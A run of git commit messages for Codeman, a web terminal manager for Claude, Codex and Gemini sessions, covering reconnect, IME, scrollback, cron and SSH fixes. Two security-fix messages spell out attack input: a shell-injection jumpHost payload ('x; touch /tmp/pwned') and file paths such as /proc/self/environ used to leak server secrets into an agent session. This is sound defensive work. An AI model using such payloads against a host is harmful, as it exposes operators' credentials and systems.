registered when /Android/i.test(navigator.userAgent).
- tests: trace-privacy test (no typed character or textarea value ever appears
in the trace; lengths/key classes still recorded), iOS harness asserts the
pointerdown recovery never cycles, self-heal source guard asserts both new
conditions; vm harness gained a ua option (navigator injected, Android UA
default so the existing wedged-IME test still exercises the recovery).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- Duplicate rows: transcript-history rows are keyed by the Claude
conversation UUID (.jsonl filename stem), which diverges from the Codeman
session id for resumed (claudeSessionId = resumeSessionId != id) and
/clear-respawned sessions, so one conversation surfaced as both a live row
and a history-only row. mergeUnifiedSessions now builds an alias map
(claudeSessionId -> Codeman id) from the live + persisted views and
resolves history/lifecycle keys through it; the route feeds
SessionState.resumeSessionId as the persisted alias.
- Inverted precedence: SessionLifecycleLog.query() returns entries
NEWEST-first, but the merge loop unconditionally overwrote name/mode so
the OLDEST entry in the window won (stale rename/mode). First-seen now
wins, mirroring the existing lastActivityAt guard.
- Tests: resumed session yields ONE row (service unit + route end-to-end
with a real transcript fixture); renamed-then-deleted session surfaces
the NEWEST name/mode. All 4 new tests fail against the pre-fix code.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- _shouldForwardWheelToApp: claude sessions forward wheel to the TUI only
when the banner-parsed cliVersion is known AND >= 2.1.187 (older/unknown
Claude Code captures wheel as select-menu navigation → keep local
scrollLines); new dependency-free _cliVersionAtLeast semver-ish compare
- gemini excluded from wheel forwarding entirely (TUI wheel behavior
unverified); codex keeps forwarding (verified); taps/clicks still
forwarded for all strip modes
- link double-fire: registerFilePathLinkProvider links now track hover
state via ILink hover/leave callbacks (_linkHovered) and
_handleDesktopTerminalClick bails while a link is hovered, so a link
click no longer also sends a synthetic SGR press/release to the TUI
- help modal: document Shift+Wheel (scroll local history when mouse
passthrough is active)
- tests: version gate (2.1.186/unknown/garbage no forward, 2.1.187+
forwards), codex/gemini split, link-hover click suppression
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- UNBOUNDED-MEMORY: DEFAULT_TERMINAL_BUFFER_TRIM_BYTES from CODEMAN_TRIM_TERMINAL_TO
had no relation to DEFAULT_TERMINAL_BUFFER_MAX_BYTES — setting only
CODEMAN_MAX_TERMINAL_BUFFER=2097152 left the 24MB trim default in force, making
BufferAccumulator.trim() (slice(-trimSize)) a no-op: unbounded growth past the cap
plus a full string re-join on every append (O(n²)). Trim default is now clamped to
75% of the resolved max (the 24MB/32MB default ratio, preserved as hysteresis);
regression test re-evaluates the module under the env via vi.resetModules.
- OVERCLAIM: reverted DEFAULT_TERMINAL_SCROLLBACK_LINES 100k -> 50k — it has zero
consumers; browser xterm scrollback is the separate hardcoded DEFAULT_SCROLLBACK
(50k) in constants.js and deliberately stays 50k (mobile-memory hazard). The tmux
history-limit raise (50k -> 100k) and PTY 32MB/24MB raise remain (those are wired).
Module docstring now claims only what is wired; fixed the stale tmux-manager.ts
comment saying the tmux limit "matches the xterm-side default in constants.js".
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The response-viewer (eye) currently reads only ~/.claude/projects — for
Codex panes it falls back to a raw terminal-buffer dump. This adds a
Codex-aware reader with exact per-pane rollout attribution.
Locating THIS pane's rollout (~/.codex/sessions/**), in confidence order:
1. history match — Session tracks the pane's last Enter
(codexLastSubmitAt); correlating it against ~/.codex/history.jsonl
{session_id, ts} entries identifies the thread the pane is ACTUALLY
on, surviving /resume, /new and /fork typed inside the codex TUI.
An entry is credited to the pane whose Enter is closest, so menu
keystrokes in other panes can't steal attribution.
2. originator match — codex panes are spawned with
CODEX_INTERNAL_ORIGINATOR_OVERRIDE=codeman_<sessionId>, which codex
(verified on 0.144.1) writes into session_meta.originator of every
rollout it creates.
3. resume-id match — resumed rollouts keep their original session_meta
(codex appends without rewriting), but the uuid is in the filename.
4. cwd+mtime heuristic — case-blind compare (codex records launch-time
path case) and rollouts claimed by other panes are excluded.
Reader details: user turns come from event_msg/user_message (real input
only — AGENTS.md / environment_context injections never appear there),
deduped against legacy response_item rows per-text so mixed-version
rollouts keep full history; image inputs render an [image xN]
placeholder; session_meta identity is cached per path (write-once).
Frontend: thread role label follows session mode (Codex/Gemini/
OpenCode); the terminal-buffer fallback is Claude-only — TUI modes show
a clear placeholder instead of a repaint dump.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
When a browser pastes an HEIC file without normalising it first, the
paste-image route now converts it to JPEG server-side via heic-convert
before writing to .claude-images/. Magic-byte validation confirms the
output is valid JPEG. Adds type declarations for the heic-convert package.
Co-authored-by: Saqeb Akhter <saqeb.akhter@gmail.com>
A freshly created shell session rendered blank until a tab-switch. selectSession()
fetches the terminal buffer, but for a just-started shell that fetch resolves before
the PTY emits its prompt, so the buffer is empty; the prompt then arrives as a live
SSE event queued during the load and _finishBufferLoad() discarded it. The discard is
correct for an established session (its fetched buffer already contains that output),
but harmful when the load painted nothing.
_finishBufferLoad(owner, { flushQueued }) now REPLAYS the queued events through
batchTerminalWrite (after _isLoadingBuffer is cleared, so they write through, not
re-queue) instead of discarding. selectSession passes flushQueued only in the empty
branch (no fresh buffer + no cache), so the established-session de-dup path is
unchanged. TDD: test/terminal-buffer-flush.test.ts exercises the real begin/finish
mixin (vm-harness, no jsdom).
_updateConnectionIndicator() ran on every keystroke (_reliableSend) and
every ACK (_ackDelivery), unconditionally writing display/className/
textContent/title. During fast typing the rendered output is usually
identical between calls, so those were wasted main-thread DOM writes.
Extracted the branch logic into a pure DOM-free _computeConnectionDescriptor()
returning { display, dotClass, text, title } (every branch/string preserved
verbatim; hidden state normalizes the three non-display fields to '' so the
compare is well-defined). _updateConnectionIndicator() now computes the
descriptor, compares all four fields against a cached _lastIndicatorDescriptor,
and early-returns when unchanged — otherwise caches and writes the DOM exactly
as before (display always; dotClass/text/title only when shown). First call
renders (cache starts null). Perf only, no behavior change.
Tests: test/connection-indicator.test.ts — 9 descriptor cases pinning the
exact strings per state + 4 skip cases (first call writes; two identical calls
write DOM once via counting setters; state change and hidden->shown re-render).
31/31 with input-send-order regression; build, frontend-syntax, prettier clean.
MAX_WS_PER_SESSION was gated by a bare Map<sessionId,number> counter,
incremented on upgrade and decremented only on the old socket's async
close. A client that dropped and immediately reconnected could land its
new upgrade before the old socket's close fired, briefly over-counting and
tripping a spurious 4008 (-> HTTP fallback). The limit also counted raw
sockets, so a reconnecting client consumed a new slot instead of its own.
Replace the counter with WsConnectionRegistry (new pure, unit-tested module)
that tracks live sockets per session keyed by clientId. A same-cid upgrade
SUPERSEDES its own socket (evicts the stale one with close 4010, reuses the
slot, no net count change) -> a reconnect can never be rejected by the cap.
The reliable-input protocol (shouldApplyInput(cid,seq)) already assumes one
logical client per cid per session, so same-cid eviction is principled, not
a regression of multi-tab (which already collides on seq). Slots are freed
EAGERLY on error/terminate, not just async close; close is identity-matched
so a superseded socket's late close is a no-op. cid-less upgrades are
admitted anonymously up to the cap and never evict (backward-compat).
Client sends cid on the WS upgrade URL (?cid=, encoded, omitted if absent).
Tests: ws-connection-registry.test.ts (reconnect-reclaim at cap, rejects
N+1th distinct, eager-terminate frees slot, cid-less up-to-limit + no-evict,
late-close-no-evict, per-session isolation) + route integration in
ws-routes.test.ts (real upgrade through the cap). 45/45 across registry +
ws-routes + input-send-order + ws-reconnect-plan; tsc 0, build, prettier,
frontend-syntax clean.
A reliable-input frame could be stranded forever if its server ACK
({t:'ia',seq}) was lost while the WebSocket kept delivering other output.
_drainSession's WS fast path skips records with sentAt!==0, and after
COD-134 the sweep only force-closes a *silent* socket -- so a lost ACK on
an otherwise-live socket (stale && !silent) was never re-sent.
_redeliverSweep now, for an active-WS session whose oldest unacked frame
is stale but the socket is NOT silent, resets sentAt=0 on every stale
unacked frame and lets the existing _drainSession re-drive them over the
live socket (server dedups by seq). The stale && silent force-close
remains the fallback for a genuinely half-open socket. Restores the
exactly-once recovery guarantee without reintroducing the flap.
Tests: new failing-first COD-135 cases in test/input-send-order.test.ts
(re-drive on live socket; leave not-yet-stale alone; keep stale+silent
force-close). 18/18 across input-send-order + reliable-input-dedup +
ws-reconnect-plan; tsc 0, frontend-syntax, build all clean.
Root cause of the WS->HTTP->WS flapping: the v1.1.15 input-delivery merge left a
call to the now-undefined _flushHttpFallbackQueuesViaWs() in ws.onopen, so every
(re)connect threw a TypeError BEFORE _onWsReady() ran -- durable input was never
re-flushed over the fresh socket, the 2s redeliver sweep then saw stale unacked
frames and force-closed the socket, reconnect, throw again: a self-sustaining
flap loop. Remove the dead call (_onWsReady, 10 lines below, is its replacement).
Resilience + observability:
- Pure CodemanWsReconnect.plan(code, attempt) (constants.js, TDD, 6 tests):
<4004 -> fast reconnect (immediate jittered first retry, faster backoff);
4008/unknown->=4004 -> bounded retry-fallback (HTTP no longer sticks until a
tab switch); 4004/4009 -> give up (session gone). Wired into onclose.
- Redeliver sweep force-closes only a SILENT socket (no recent recv), not one
actively delivering output/ACKs -- stops self-inflicted flaps while typing.
- Client logs WS close code/reason to crash-diag; server logs [ws]
open/close/terminate/4008 (console -> journald; Fastify runs logger:false).
Verified: 6/6 unit, tsc 0, frontend-syntax + prettier clean, build; beta WS
reaches connected with zero console errors (onopen TypeError gone),
_wsLastRecvAt tracked, server [ws] lines emit.
The upstream v1.1.15 merge spliced upstream's transport-object indicator
body onto local's _connectionStatus-based _updateConnectionIndicator()
without defining `transport`, so every transport.* reference threw
ReferenceError on any queued state. That hid the "WS" status and, because
_reliableSend() updates the indicator before _drainSession(), made every
keystroke skip immediate delivery (input flushed only on the 2s sweep =
typing lag).
- Rewrite _updateConnectionIndicator() to show the terminal WebSocket
transport from _wsState (WS / HTTP / WS… / Offline), falling back to the
SSE _connectionStatus only on the idle dashboard.
- Only annotate a backlog (· N queued) above 4 bytes so normal typing no
longer flickers "sending 1B" on each key press.
- test/connection-indicator.test.ts (new): transport labels, the >4B
threshold, an exhaustive never-throws guard for the ReferenceError, and
the _reliableSend -> _drainSession invariant (typing-lag guard).
- test/input-send-order.test.ts: reconcile to local's durable input layer
(the prior coalescing-fallback tests had been failing since 1255e28).
A shell terminal could render output diagonally (each line shifted one
column right) after a full page reload or a cursor-query-failure replay.
Root cause: capturePaneBuffer's full-history path (capture-pane -p -e -S -)
and its cursor-query-failure fallback returned raw scrollback, which tmux
joins with a BARE \n. The browser xterm uses convertEol:false (correct for
the live PTY stream, which carries real \r\n), so each bare \n dropped a
row without returning the cursor to column 0 -> staircase. The visible /
tab-switch path (formatPaneSnapshot) was immune because it repaints each
row with an absolute cursor CSI.
Fix: new pure helper normalizeScrollbackEol() (\r?\n -> \r\n, idempotent
on CRLF, leaves lone \r overwrites untouched, adds/removes no rows) applied
at both raw-return seams. The absolute-positioned snapshot path is unchanged.
Tests: test/tmux-scrollback-eol.test.ts pins the invariant (no LF without a
preceding CR) + CRLF idempotency + lone-CR preservation. 136/136 across
tmux-scrollback-eol + tmux-capture-full-history + tmux-manager +
routes/session-routes; build, tsc, prettier, frontend-syntax clean.
A full page reload (GET /api/sessions/:id/terminal with no ?tail=) now captures
the ENTIRE tmux scrollback via capture-pane -p -e -S -, so users get back history
that scrolled off Codeman's byte buffer. Tab switches (?tail=N) keep the fast
visible-frame capture.
- tmux-manager capturePaneBuffer/captureActivePaneBuffer take { fullHistory }:
full-history returns raw linear scrollback (skips the single-screen
formatPaneSnapshot repaint, which would clip multi-screen history).
- /terminal selects full-history on full reload, visible on tail; caps the
payload at the configured terminalBufferMaxBytes (keeps most-recent bytes,
line-aligned) and returns source/fullSize/truncated metadata.
Verified: tsc 0, tmux-capture-full-history 5/5, session-routes 68/68.
Caveat: lines tmux already evicted past its history-limit can't be recovered.
Defense-in-depth after COD-115. If the interactive PTY exits non-zero
repeatedly within a short window, recovery/reconnect paths recreate it
indefinitely (COD-115 saw 114 'exited with code: 1' events + orphans).
- New pure InteractivePtyExitBreaker (session-pty-exit-breaker.ts):
injectable time, sliding window, clean-exit resets counter, stays
tripped until reset(). Defaults: threshold 5, window 10s.
- Session records each interactive PTY exit in the breaker; on trip it
flips _status to 'error', sets _respawnBlocked, emits
respawnBreakerTripped. startInteractive() refuses to respawn while
blocked, so all recovery/reconnect callers stop looping uniformly.
- Explicit user restart (POST /api/sessions/:id/interactive) calls
resetRespawnBreaker() so intentional restarts are never blocked.
- New SSE event session:respawnBreakerTripped wired in sse-events.ts +
constants.js (registries in sync) + session-listener-wiring.ts;
minimal diagnostic toast in app.js.
- Tests: test/respawn-pty-breaker.test.ts (pure trip/reset/window +
MockSession session-level trip/reset).
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
When the web server is launched from inside a tmux pane it inherits TMUX/
TMUX_PANE. tmux's nesting guard then makes every new attach-bridge PTY
(`tmux attach-session`, used by codex/opencode/gemini and mux-wrapped claude)
exit code 1; the respawn controller recreates the dead bridge → infinite loop.
The existing guard in buildMuxAttachEnv() used `TMUX: undefined` on a
{...process.env} spread, which leaves the KEY present with value undefined —
node-pty serializes it as the literal string "TMUX=undefined", still tripping
the guard. (The working create path in tmux-manager.ts uses `delete`.)
Fix:
- Primary: delete process.env.TMUX / TMUX_PANE at web bootstrap (src/index.ts)
so every downstream {...process.env} spread is clean regardless of launch
context. `delete`, not `= undefined`.
- buildMuxAttachEnv(): build a copy and `delete` TMUX/TMUX_PANE/CLAUDECODE
(and COLORTERM when not truecolor) instead of `: undefined` — same node-pty
quirk affected all of them.
- Test: assert the keys are genuinely ABSENT (`'TMUX' in env === false`), not
merely undefined — the prior test only checked `toBeUndefined()`, which is
why the bug slipped through. Red→green confirmed.
Verified on isolated beta launched from inside tmux (inherited the poisonous
TMUX=codeman,980,7): created a codex session + triggered interactive attach —
the bridge `tmux -L codeman-beta attach-session` spawned with NO TMUX in its
env, attached successfully, zero "exited with code: 1", server healthy.
Circuit-breaker for repeated non-zero bridge exits (AC bullet 4, optional)
split to a follow-up. Deploy-pending (substrate): never auto-deployed.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Pins a "Browse all sessions…" item at the bottom of the command palette
list (after "New session"). Activating it closes the palette and opens
the Session Manager modal, bridging the gap between the fast in-memory
switcher and the full server-side history browser.
The item gets a distinct visual treatment (≡ icon, muted title/icon
color, 4px top gap) so it reads as a secondary action separate from the
primary session rows.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
- src/remote-hosts.ts: add missing execAsync = promisify(exec) that was
implied by intermediate commits not in the cherry-pick set
- src/web/routes/session-routes.ts: add getDataDir import and
readRemoteCases/readRemoteHosts/toSessionRemote for remote case support
in quick-start; narrow casePath string|null via resolvedCasePath cast
- test/routes/session-routes.test.ts: add vi.hoisted remoteStore mock for
remote-hosts.js; fix 'creates session from remote case' test to use
/api/quick-start (remote cases are not supported on /api/sessions)
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
buildSshConnectionArgs interpolated jumpHost raw while its siblings
(identityFile/socksProxy/extraSshOptions) were shellescaped. The token array is
joined and run via execAsync (/bin/sh -c), so a jumpHost like "x; touch /tmp/pwned"
executed. The Zod denylist only blocked backtick/newline/$( and let ;|& and spaces
through.
- shellescape jumpHost in buildSshConnectionArgs (primary fix)
- replace jumpHost denylist with a structural allowlist: [user@]host[:port],
comma-separated multi-hop, bracketed IPv6; no shell metachar can appear
- update/extend tests: escaped -J assertion + injection-safety case
Verified: remote-ssh-options (11) + case-routes (33) pass, tsc --noEmit clean,
regex accepts valid forms / rejects 8 injection payloads.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
The Remote case form could only reach port-22, default-identity, directly
SSH-able hosts. Add an escape-hatch set of SSH connection options so Codeman
can reach a host like aa-desktop (custom port 2222, ed25519 identity, cloudflared
SOCKS5 ProxyCommand) the way ssh-aa-desktop does — without shelling out to that
wrapper.
- Model (types/session.ts): new optional RemoteSshOptions (identityFile,
socksProxy, jumpHost, extraSshOptions) on RemoteHost AND SessionRemote; all
absent = today's behavior. toSessionRemote() carries them case->session.
- Shared buildSshConnectionArgs(remote) in remote-hosts.ts: pure, exported,
ordered ssh connection tokens (-o BatchMode=yes, -p, -i <abs identity with
~/$HOME expanded + shellescaped>, -J, -o ProxyCommand=nc -X 5 -x <socks>
%h %p emitted as ONE shellescaped token so %h %p reach ssh literally, then
each extraSshOptions -o). Both buildRemoteLaunchCommand (tmux-manager.ts) and
buildRemoteTmuxCheckCommand now use it, so the prereq probe and the real
launch connect identically. checkRemoteTmuxAvailable widened to accept the
options (callers already pass the full host).
- Validation (schemas.ts): identityFile (no newline/NUL), socksProxy
(host:port), jumpHost (no shell metachars), extraSshOptions (KEY=VALUE,
reject newline/NUL/backtick/$() — defense-in-depth on operator-entered config.
- UI (index.html + session-ui.js): SSH Port field + collapsible "Advanced SSH"
section (identity, SOCKS proxy, jump host, extra -o options one per line);
wired into the remote-host create payload.
Empty-options remotes emit byte-identical ssh to before (pinned by test).
Tests: test/remote-ssh-options.test.ts (buildSshConnectionArgs +
buildRemoteLaunchCommand + buildRemoteTmuxCheckCommand for the aa-desktop set,
escaping/%h %p/identity-~ expansion, byte-identical back-compat); case-routes
schema tests (advanced options round-trip; malformed extraSshOptions/socksProxy
rejected). tsc/eslint/frontend-syntax/prettier/build clean.
Acceptance (real remote, no wrapper): the emitted command connected to
aa-desktop through the cloudflared SOCKS proxy and created a durable remote
tmux session (verified independently via ssh-aa-desktop: CONNECTED_NO_WRAPPER,
STILL_ALIVE_AFTER_DETACH); checkRemoteTmuxAvailable over the proxy returned
{ok:true, tmuxPath:/usr/local/bin/tmux}; test session cleaned up.
Desktop click-to-position-cursor died under the server's mouse-DECSET strip
(same root cause as the mobile touchend tap regression): xterm's native mouse
encoder only emits SGR while mouseTrackingMode is ON, but the server strips the
enabling DECSETs from claude/codex/gemini output. Hand-encode the report for
plain left-clicks (_handleDesktopTerminalClick), skipping every click that
already means something else (synthetic/compat, modified, double/triple,
drag-selection, off-grid, xterm encoder live).
Also widen forwarding to the wheel: Claude Code 2.1.187+ scrolls its own
transcript on SGR wheel reports and no longer captures wheel as select-menu
navigation (verified against 2.1.202), so forward the wheel to the TUI for
strip-mode sessions at the buffer bottom (40ms-coalesced to avoid a tmux
send-keys storm). Shift+wheel and any scrolled-up viewport stay on xterm's
local scrollback. Guard synthetic taps/clicks on viewport-at-bottom so a
scrolled-up report can't hit-test the wrong row.
Tests: 12 cases in test/terminal-touch-tap.test.ts. Verified E2E via Playwright
against the live instance (wheel up/down forward, Shift+wheel local, click).
v1.1.7 (3172bef, arrived via the master merge) strips mouse-tracking DECSET
sequences from claude/codex/gemini output so the wheel keeps scrolling
scrollback. Side effect: the browser xterm's mouseTrackingMode is permanently
'none' for those sessions, and the mobile touchend tap branch gates its
synthetic click on exactly that mode — so tap-to-position-cursor silently died.
Fix: when tracking reads 'none' but the session mode is one the server strips
(claude/codex/gemini — the PTY-side TUI still has tracking ON), encode the SGR
press+release report directly from the touch point and send it to the PTY,
bypassing xterm's mouse encoder. No DOM click is dispatched, so xterm's local
selection cannot trigger either.
Tests: 3 new cases in test/terminal-touch-tap.test.ts (SGR encoding, grid
clamping, shell-mode exclusion); verified E2E via Playwright iPhone emulation
against both a stripped-stream instance and the production bundle.
Three independent root causes of intermittent Chinese character loss
(English was unaffected because it bypasses the composition path):
1. input-cjk.js state machine: stuck _composing when compositionend never
fires (WeChat/Sogou IMEs) silently swallowed all input; the deferred
compositionend flush could reset the textarea mid-next-composition
(cancels the live IME composition on iOS); the 100ms keydown-echo
window discarded ANY input regardless of content.
2. Focus stealing: session-select / SSE-reconnect paths call
terminal.focus() (15+ call sites), landing focus on xterm's hidden
textarea; with the CJK onData gate active, everything typed there was
swallowed. Fix: focus router in initTerminal routes ALL
terminal.focus() calls to the CJK field while it is visible, plus a
self-healing onData gate that reclaims focus when it swallows input.
3. Android InputConnection wedge (9-key IMEs + Chromium): the keyboard
composes in its own UI but delivers zero DOM events. Fix: skip
redundant textarea value/selection writes (they race IME session
setup), and re-tapping the focused empty field forces a blur→focus
cycle that restarts the input session.
Diagnostics: input-cjk.js now traces every IME event/flush decision into
the crash-diag breadcrumbs; /api/crash-diag stores beacons per page-load
id (iOS PWA reloads no longer wipe the trail, concurrent clients no
longer clobber each other) and flushes on visibilitychange.
Tests: test/input-cjk.test.ts (vm-sandbox, 9 cases incl. regression
guards for all three root causes).
The mobile media query only overrode .response-viewer-body with a flat
font-size: 12px / padding: 12px, leaving the desktop response-viewer
typography system (--rv-content-max, .rv-text pre, heading scale) with no
mobile tuning. Bump body text to 14.5px/1.65, give code blocks phone-sized
padding and 11.5px code, scale headings (h1 1.35em / h2 1.2em / h3 1.08em),
let content span full width, and cap the panel at 92vh.
Layers cleanly on top of the existing response-viewer selectors in
styles.css; desktop rendering is unchanged.
createInitialRalphTrackerState() stamps lastActivity: Date.now(). The
'should create fresh instances each time' test deep-equaled two factory
results, so two calls straddling a millisecond boundary differed by 1ms
and failed intermittently (e.g. PR #139 CI: 1782927694581 vs ...580).
Exclude the dynamic lastActivity from the equality check and assert it
is a number separately, preserving the test's intent (distinct instances
with identical initial field values) without the timing race.
- docs/cron-guide.md: comprehensive user/operator guide for the Cron
feature (fields, schedule types, prompt security, execution flow, API,
SSE, limits, troubleshooting), sourced from the implementation.
- SPEEDRUN.md: fast-execution protocol for Claude grounded in this repo's
real commands and CLAUDE.md guardrails.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01SSVnYek4nq4Ztmbb3SrCA5
The codeman_session cookie was only set on the Basic Auth path with a fixed
lifetime from login and never refreshed, while the server-side session store
slides its TTL (refreshOnGet). So the browser cookie expired mid-use, the next
request arrived cookie-less and fell through to Basic Auth, popping the native
username/password dialog — perceived as a random logout while actively working.
Re-issue the cookie on every authenticated (valid-cookie) request so the browser
lifetime tracks the server-side sliding TTL.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Adds a 'WebGL Renderer' toggle to Settings > Appearance (desktop). WebGL
stays on by default; users can turn it off to force the DOM renderer when
they hit GPU glitches, without needing the ?nowebgl URL param. Explicit
opt-in (or ?webgl=force) clears a stale auto-fallback marker. Mobile skip
and the long-task auto-fallback safety net are unchanged.
The device/param/sticky/pref interaction is factored into a pure,
unit-tested shouldSkipWebGL() helper in constants.js.
First increment of the read-only "complete + searchable session list".
- New src/services/unified-session-service.ts: mergeUnifiedSessions() combines
live + persisted (state.json) + lifecycle + ~/.claude transcript history + mux
stats into one list de-duped by sessionId, with precedence
history < lifecycle < persisted < live, a meaningfulness floor that drops bare
lifecycle/mux-only noise, and a stable newest-first sort. Plus
filterAndPaginate() (case-insensitive q over name/firstPrompt/workingDir/
sessionId; total before paging; limit clamped [1,500]). No IO — unit-testable.
- New GET /api/sessions/unified in session-routes.ts: gathers the five sources
from ctx (sessions/store/lifecycle/scanProjectDir/mux, each try/caught), feeds
the pure service, returns { sessions, total } (ApiResponse envelope). testMode
short-circuits to empty.
Tests: unified-session-service.test.ts (12, pure) + unified-sessions-routes.test.ts
(4, app.inject).
Bump the centralized terminal-history defaults: tmux scrollback 50k->100k and
PTY buffer cap 2MB->32MB (trim 1.5MB->24MB). Both remain env/settings overridable
and bounds-clamped. Worst-case 20-session buffer budget rises 40MB->640MB.
Stacked on the terminal-history config commit.
Introduces src/config/terminal-history.ts as the single source of truth for terminal scrollback lines, tmux history-limit, and PTY buffer byte caps. Behavior-neutral: defaults match prior hardcoded values; env overrides preserved. tmuxHistoryLimit is wired live (setHistoryLimit + respawn re-apply); the other three keys are scaffolding for a stacked follow-up. Reviewed: CI green (typecheck/lint + full test suite).
Introduce src/config/terminal-history.ts: one place for terminal scrollback,
tmux history-limit, and PTY buffer byte caps, each overridable via env var or
the settings object and bounds-clamped via resolveTerminalHistoryConfig().
Defaults match the prior hardcoded values, so this is behavior-neutral. Wires
the resolver through buffer-limits, tmux-manager (incl. a setHistoryLimit so a
settings change applies live), session, server, system-routes, session-routes,
schemas, and the config port. Adds 4 optional settings keys (terminalScrollback
Lines, tmuxHistoryLimit, terminalBufferMaxBytes, terminalBufferTrimBytes) with
bounds + a trim<=max cross-check.
Two blind adversarial reviewers found real holes in the prior cron commits:
SECURITY (was CRITICAL): the prompt-file guard was blocklist-only by default,
so promptFilePath:/proc/self/environ leaked the SERVER PROCESS's entire
environment (every secret) into the agent session, and /dev/zero or a FIFO
caused an unbounded readFile → OOM/hang DoS. A denylist is the wrong posture
for an exfil-into-LLM sink. resolveSafePromptPath now:
- confines the realpath-resolved file to the job's working dir (ALLOWLIST) —
closes /proc, /dev, other homes, modern cloud-cred paths, and symlink escapes
- requires a regular file (rejects dirs/FIFOs/char devices)
- caps the read at MAX_PROMPT_FILE_BYTES (1 MiB)
- keeps the /etc,/root,secrets blocklist as defense-in-depth
LOGIC:
- once-rearm (was MED, defeated in prod): the edit UI round-trips the full
job, so the field-PRESENCE re-arm check always fired → a renamed fired
once-job could be resurrected via edit→re-enable. Now compares schedule
VALUES; an unchanged schedule never re-arms.
- skipped-run history (was HIGH): recording a skip every tick was unbounded
state.json growth. Now coalesces consecutive skips (one record per streak)
and prunes global run history to MAX_CRON_RUN_HISTORY (500), covering the
launch path too.
- skip bookkeeping (was MED): a skip no longer advances lastRunAt (nothing
ran); lastStatus still reflects 'skipped'.
Regression tests added/updated (43 pass): /proc/self/environ + outside-workspace
+ symlink-escape + non-regular + oversized all blocked, in-workspace file
passes; UI-path once resurrection blocked; consecutive skips coalesce to one
record; skip leaves lastRunAt null.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01PmvZR12aX2v8K7YhqxPUAU
1. once-rearm on edit: editing any field of a finished one-time job reset
completedOnce, silently resurrecting it. Now only a SCHEDULE edit
(scheduleType/runAt/interval/daily/weekly) re-arms a completed once job;
cosmetic edits (rename/notes) leave completedOnce intact.
2. update-validation gap: CronJobUpdateSchema = .partial() drops the cross-field
superRefine, so a PUT switching scheduleType without its dependent field
produced a dead enabled job (nextRunAt:null). updateJob now re-validates the
MERGED job against the full CronJobSchema and throws 400 on inconsistency,
leaving the stored job untouched.
3. concurrency-skip silent starvation: skip_if_same_agent_running advanced the
schedule but wrote no run record, so a perpetually-skipped job had empty
history. Now records a 'skipped' run (new CronJobRunStatus) + lastStatus.
Tests updated/added in cron-service.test.ts (37 pass): once non-schedule edit
preserves completedOnce, schedule edit re-arms, inconsistent partial update is
rejected with the stored job untouched, and the skip path records a skipped run.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01PmvZR12aX2v8K7YhqxPUAU
A cron job's promptFilePath is user-supplied via the API and was read with an
unconfined readFile of any absolute path, so a hostile job config could exfil
arbitrary host files (e.g. /etc/passwd, SSH keys) into a Claude session.
Guard the read in resolvePrompt by mirroring the attachment-serving guard
(resolveServableAttachmentPath in file-routes): realpath-resolve the path, then
reject via the shared blocklist (/etc, /root, secret locations) plus the
optional workspace-confinement toggle before reading.
Regression tests in cron-service.test.ts: blocks /etc/passwd (the live repro)
and /root/*, fails cleanly on a missing file, and still allows an ordinary
prompt file outside the blocklist.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01PmvZR12aX2v8K7YhqxPUAU
Rename the recurring-jobs feature scheduler->cron to disambiguate from the
legacy ScheduledRun system (/api/scheduled), which is left untouched:
- ScheduledJob->CronJob, SchedulerService->CronService
- /api/scheduler/jobs -> /api/cron/jobs; SSE scheduler:* -> cron:*
- state keys cronJobs/cronJobRuns
- files moved to src/cron/, cron-routes.ts, cron-port.ts, types/cron.ts
- frontend cron-ui.js, #cronModal, menu "Cron"
- docs moved to docs/cron-discovery.md + docs/cron-build-brief.md, README guides
- new tests: cron-service.test.ts, cron-time.test.ts
Green: tsc, lint, frontend-syntax, format, 30 cron + 9 legacy scheduled-runs tests.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01PmvZR12aX2v8K7YhqxPUAU
Adds a saved/named scheduling layer on top of Codeman's existing session
primitives. Distinct from the legacy run-now ScheduledRun concept.
- types/scheduler.ts: ScheduledJob + ScheduledJobRun
- state-store: persist scheduledJobs/scheduledJobRuns in ~/.codeman/state.json
- scheduler/scheduler-time.ts: pure once/interval/daily/weekly next-run math
- scheduler/scheduler-service.ts: CRUD, Run Now, due-checker tick, run history;
reuses SessionPort (create -> start -> writeViaMux) for launches
- web/routes/scheduler-routes.ts: /api/scheduler/jobs CRUD + run + history
- web/schemas.ts: zod validation with schedule-type-aware refinements
- web/sse-events.ts: scheduler:* events
- server.ts: wire service into route context + 30s background tick loop
- test/scheduler-time.test.ts: 14 unit tests for next-run calculations
Phase 1 discovery recorded in SCHEDULER_DISCOVERY.md.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Rp7JhmQXcYJhmxFMdZuuah
Release 1.2.1: fix iOS Safari local echo on keyboard-up tab switches
(selectSession now runs the keyboard-show heal so typed input paints at
the prompt instead of staying invisible/mispositioned until a manual
keyboard toggle).
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Release 1.2.0: Gemini run mode, cross-session search, away digest, and
Ralph todo-config (PRs #133–#136), plus review fixes. Also refreshes CLAUDE.md
with the new-feature docs and several audit-verified drift corrections
(MockSession path, ultracode floating-window toggle, route counts, durable
input-delivery layer, mobile image-upload limits).
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Gemini (PR #134) blockers:
- runGemini() now unwraps the {success,data} envelope: status check reads
.data.available, quick-start reads data.data.sessionId (was reading the raw
